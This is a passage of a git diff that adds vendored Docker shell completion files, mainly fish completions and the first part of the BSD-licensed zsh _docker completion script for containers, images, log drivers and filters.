'__fish_docker_no_subcommand' -a start -d 'Start a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process" +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN" +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container" + +# stats +complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics" +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result' +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container" + +# stop +complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.' 
+complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container" + +# tag +complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository' +complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force' +complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage' + +# top +complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container" + +# unpause +complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container' +complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container" + +# version +complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information' +complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format -d 'Format the output using the given go template' +complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage' + +# wait +complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code' +complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container" diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt new file mode 100644 index 0000000000..18e1b53c13 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt @@ -0,0 +1 @@ +See 
https://github.com/samneirinck/posh-docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker new file mode 100644 index 0000000000..ecae826a4a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker @@ -0,0 +1,2787 @@ +#compdef docker dockerd +# +# zsh completion for docker (http://docker.com) +# +# version: 0.3.0 +# github: https://github.com/felixr/docker-zsh-completion +# +# contributors: +# - Felix Riedel +# - Steve Durrheimer +# - Vincent Bernat +# +# license: +# +# Copyright (c) 2013, Felix Riedel +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * Neither the name of the nor the +# names of its contributors may be used to endorse or promote products +# derived from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# + +# Short-option stacking can be enabled with: +# zstyle ':completion:*:*:docker:*' option-stacking yes +# zstyle ':completion:*:*:docker-*:*' option-stacking yes +__docker_arguments() { + if zstyle -t ":completion:${curcontext}:" option-stacking; then + print -- -s + fi +} + +__docker_get_containers() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local kind type line s + declare -a running stopped lines args names + + kind=$1; shift + type=$1; shift + [[ $kind = (stopped|all) ]] && args=($args -a) + + lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line + lines=(${lines[2,-1]}) + + # Container ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}" + s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" + s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" + if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then + stopped=($stopped $s) + else + 
running=($running $s) + fi + done + fi + + # Names: we only display the one without slash. All other names + # are generated and may clutter the completion. However, with + # Swarm, all names may be prefixed by the swarm node name. + if [[ $type = (names|all) ]]; then + for line in $lines; do + names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}}) + # First step: find a common prefix and strip it (swarm node case) + (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/} + # Second step: only keep the first name without a / + s=${${names:#*/*}[1]} + # If no name, well give up. + (( $#s != 0 )) || continue + s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" + s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" + if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then + stopped=($stopped $s) + else + running=($running $s) + fi + done + fi + + [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0 + [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0 + return ret +} + +__docker_complete_stopped_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers stopped all "$@" +} + +__docker_complete_running_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers running all "$@" +} + +__docker_complete_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all all "$@" +} + +__docker_complete_containers_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all ids "$@" +} + +__docker_complete_containers_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all names "$@" +} + +__docker_complete_info_plugins() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + emulate -L zsh + setopt extendedglob + local -a plugins + plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options 
info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: }) + _describe -t plugins "$1 plugins" plugins && ret=0 + return ret +} + +__docker_complete_images() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a images + images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}}) + _describe -t docker-images "images" images && ret=0 + __docker_complete_repositories_with_tags && ret=0 + return ret +} + +__docker_complete_repositories() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a repos + repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]}) + repos=(${repos#}) + _describe -t docker-repos "repositories" repos && ret=0 + return ret +} + +__docker_complete_repositories_with_tags() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a repos onlyrepos matched + declare m + repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *}) + repos=(${${repos%:::}#}) + # Check if we have a prefix-match for the current prefix. 
+ onlyrepos=(${repos%::*}) + for m in $onlyrepos; do + [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && { + # Yes, complete with tags + repos=(${${repos/:::/:}/:/\\:}) + _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0 + return ret + } + done + # No, only complete repositories + onlyrepos=(${${repos%:::*}/:/\\:}) + _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0 + + return ret +} + +__docker_search() { + [[ $PREFIX = -* ]] && return 1 + local cache_policy + zstyle -s ":completion:${curcontext}:" cache-policy cache_policy + if [[ -z "$cache_policy" ]]; then + zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy + fi + + local searchterm cachename + searchterm="${words[$CURRENT]%/}" + cachename=_docker-search-$searchterm + + local expl + local -a result + if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \ + && ! _retrieve_cache ${cachename#_}; then + _message "Searching for ${searchterm}..." + result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]}) + _store_cache ${cachename#_} result + fi + _wanted dockersearch expl 'available images' compadd -a result +} + +__docker_get_log_options() { + [[ $PREFIX = -* ]] && return 1 + + integer ret=1 + local log_driver=${opt_args[--log-driver]:-"all"} + local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options + + awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream") + fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag") + gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels") + gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag") + journald_options=("env" "labels" "tag") + json_file_options=("env" "labels" "max-file" "max-size") + 
logentries_options=("logentries-token") + syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag") + splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag") + + [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0 + [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0 + [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0 + [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0 + [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0 + [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0 + [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0 + [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0 + [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0 + + return ret +} + +__docker_complete_log_drivers() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog) + _describe -t log-drivers "log drivers" drivers && ret=0 + return ret +} + +__docker_complete_log_options() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (syslog-format) + syslog_format_opts=('rfc3164' 'rfc5424' 
'rfc5424micro') + _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + __docker_get_log_options -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_detach_keys() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + compset -P "*," + keys=(${:-{a-z}}) + ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}}) + _describe -t detach_keys "[a-z]" keys -qS "," && ret=0 + _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0 +} + +__docker_complete_pid() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local -a opts vopts + + opts=('host') + vopts=('container') + + if compset -P '*:'; then + case "${${words[-1]%:*}#*=}" in + (container) + __docker_complete_running_containers && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0 + _describe -t pid-opts "PID Options" opts && ret=0 + fi + + return ret +} + +__docker_complete_runtimes() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + emulate -L zsh + setopt extendedglob + local -a runtimes_opts + runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}}) + _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0 +} + +__docker_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (ancestor) + __docker_complete_images && ret=0 + ;; + (before|since) + __docker_complete_containers && ret=0 + ;; + (health) + health_opts=('healthy' 'none' 'starting' 'unhealthy') + _describe -t health-filter-opts "health filter options" health_opts && ret=0 + ;; + (id) + __docker_complete_containers_ids && ret=0 + ;; + (is-task) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + (name) + __docker_complete_containers_names && ret=0 + 
;; + (network) + __docker_complete_networks && ret=0 + ;; + (status) + status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing') + _describe -t status-filter-opts "status filter options" status_opts && ret=0 + ;; + (volume) + __docker_complete_volumes && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume') + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_search_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a boolean_opts opts + + boolean_opts=('true' 'false') + opts=('is-automated' 'is-official' 'stars') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (is-automated|is-official) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_images_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a boolean_opts opts + + boolean_opts=('true' 'false') + opts=('before' 'dangling' 'label' 'reference' 'since') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (before|reference|since) + __docker_complete_images && ret=0 + ;; + (dangling) + _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_events_filter() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a opts + + opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (container) + __docker_complete_containers && ret=0 + ;; + (daemon) + emulate -L zsh + setopt extendedglob + local -a 
daemon_opts + daemon_opts=( + ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}} + ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:} + ) + _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0 + ;; + (event) + local -a event_opts + event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach' + 'exec_start' 'export' 'health_status' 'import' 'kill' 'load' 'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start' + 'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update') + _describe -t event-filter-opts "event filter options" event_opts && ret=0 + ;; + (image) + __docker_complete_images && ret=0 + ;; + (network) + __docker_complete_networks && ret=0 + ;; + (type) + local -a type_opts + type_opts=('container' 'daemon' 'image' 'network' 'volume') + _describe -t type-filter-opts "type filter options" type_opts && ret=0 + ;; + (volume) + __docker_complete_volumes && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_prune_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a opts + + opts=('until') + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + *) + _message 'value' && ret=0 + ;; + esac + else + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +# BO container + +__docker_container_commands() { + local -a _docker_container_subcommands + _docker_container_subcommands=( + "attach:Attach to a running container" + "commit:Create a new image from a container's changes" + "cp:Copy files/folders between a container and the local filesystem" + "create:Create a new container" + "diff:Inspect changes on a container's filesystem" + "exec:Run a command in a running container" + 
"export:Export a container's filesystem as a tar archive" + "inspect:Display detailed information on one or more containers" + "kill:Kill one or more running containers" + "logs:Fetch the logs of a container" + "ls:List containers" + "pause:Pause all processes within one or more containers" + "port:List port mappings or a specific mapping for the container" + "prune:Remove all stopped containers" + "rename:Rename a container" + "restart:Restart one or more containers" + "rm:Remove one or more containers" + "run:Run a command in a new container" + "start:Start one or more stopped containers" + "stats:Display a live stream of container(s) resource usage statistics" + "stop:Stop one or more running containers" + "top:Display the running processes of a container" + "unpause:Unpause all processes within one or more containers" + "update:Update configuration of one or more containers" + "wait:Block until one or more containers stop, then print their exit codes" + ) + _describe -t docker-container-commands "docker container command" _docker_container_subcommands +} + +__docker_container_subcommand() { + local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update + local expl help="--help" + integer ret=1 + + opts_attach_exec_run_start=( + "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys" + ) + opts_create_run=( + "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout or stderr]:device:(STDIN STDOUT STDERR)" + "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: " + "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: " + "($help)*--cap-add=[Add Linux capabilities]:capability: " + "($help)*--cap-drop=[Drop Linux capabilities]:capability: " + "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " + "($help)--cidfile=[Write the container ID to the file]:CID file:_files" + "($help)--cpus=[Number of 
CPUs (default 0.000)]:cpus: " + "($help)*--device=[Add a host device to the container]:device:_files" + "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: " + "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: " + "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: " + "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: " + "($help)--disable-content-trust[Skip image verification]" + "($help)*--dns=[Custom DNS servers]:DNS server: " + "($help)*--dns-option=[Custom DNS options]:DNS option: " + "($help)*--dns-search=[Custom DNS search domains]:DNS domains: " + "($help)*"{-e=,--env=}"[Environment variables]:environment variable: " + "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: " + "($help)*--env-file=[Read environment variables from a file]:environment file:_files" + "($help)*--expose=[Expose a port from the container without publishing it]: " + "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups" + "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts" + "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" + "($help)--init[Run an init inside the container that forwards signals and reaps processes]" + "($help)--ip=[Container IPv4 address]:IPv4: " + "($help)--ip6=[Container IPv6 address]:IPv6: " + "($help)--ipc=[IPC namespace to use]:IPC namespace: " + "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" + "($help)*--link=[Add link to another container]:link:->link" + "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " + "($help)*"{-l=,--label=}"[Container metadata]:label: " + "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" + 
"($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options" + "($help)--mac-address=[Container MAC address]:MAC address: " + "($help)--name=[Container name]:name: " + "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" + "($help)*--network-alias=[Add network-scoped alias for the container]:alias: " + "($help)--oom-kill-disable[Disable OOM Killer]" + "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]" + "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]" + "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]" + "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports" + "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid" + "($help)--privileged[Give extended privileges to this container]" + "($help)--read-only[Mount the container's root filesystem as read only]" + "($help)*--security-opt=[Security options]:security option: " + "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " + "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: " + "($help)*--sysctl=-[sysctl options]:sysctl: " + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" + "($help)*--ulimit=[ulimit options]:ulimit: " + "($help)--userns=[Container user namespace]:user namespace:(host)" + "($help)--tmpfs[mount tmpfs]" + "($help)*-v[Bind mount a volume]:volume: " + "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)" + "($help)*--volumes-from=[Mount volumes from the specified container]:volume: " + "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" + ) + opts_create_run_update=( + "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)" + "($help -c 
--cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" + "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " + "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " + "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " + "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " + "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " + "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " + "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: " + "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " + "($help)--memory-reservation=[Memory soft limit]:Memory limit: " + "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " + "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)" + ) + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (attach) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help)--no-stdin[Do not attach stdin]" \ + "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ + "($help -):containers:__docker_complete_running_containers" && ret=0 + ;; + (commit) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --author)"{-a=,--author=}"[Author]:author: " \ + "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ + "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \ + "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \ + "($help -):container:__docker_complete_containers" \ + "($help -): :__docker_complete_repositories_with_tags" && ret=0 + ;; + (cp) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol 
link]" \ + "($help -)1:container:->container" \ + "($help -)2:hostpath:_files" && ret=0 + case $state in + (container) + if compset -P "*:"; then + _files && ret=0 + else + __docker_complete_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (create) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_run \ + $opts_create_run_update \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (diff) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (exec) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ + "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \ + "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \ + "($help)--privileged[Give extended Linux capabilities to the command]" \ + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \ + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \ + "($help -):containers:__docker_complete_running_containers" \ + "($help -)*::command:->anycommand" && ret=0 + case $state in + (anycommand) + shift 1 words + (( CURRENT-- )) + _normal && ret=0 + ;; + esac + ;; + (export) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: 
" \ + "($help -s --size)"{-s,--size}"[Display total file sizes]" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (kill) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (logs) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--details[Show extra details provided to logs]" \ + "($help -f --follow)"{-f,--follow}"[Follow log output]" \ + "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \ + "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \ + "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \ + "($help -)*:containers:__docker_complete_containers" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all containers]" \ + "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \ + "($help)--format=[Pretty-print containers using a Go template]:template: " \ + "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \ + "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -s --size)"{-s,--size}"[Display total file sizes]" \ + "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0 + ;; + (pause|unpause) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (port) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:containers:__docker_complete_running_containers" \ + "($help -)2:port:_ports" && ret=0 + ;; + 
